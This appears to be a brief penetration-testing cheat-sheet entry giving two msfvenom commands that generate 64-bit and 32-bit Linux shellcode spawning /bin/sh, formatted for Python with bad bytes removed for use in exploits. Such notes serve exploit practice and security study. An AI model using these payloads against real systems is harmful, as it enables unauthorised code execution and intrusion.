# Shellcode

## MSFVenom

### Linux /bin/sh

```
# 64bit shellcode
msfvenom -p linux/x64/exec cmd=/bin/sh -f python -b "\x00\x0a"

# 32bit shellcode
msfvenom -p linux/x86/exec cmd=/bin/sh -f python -b "\x00\x0a"
```
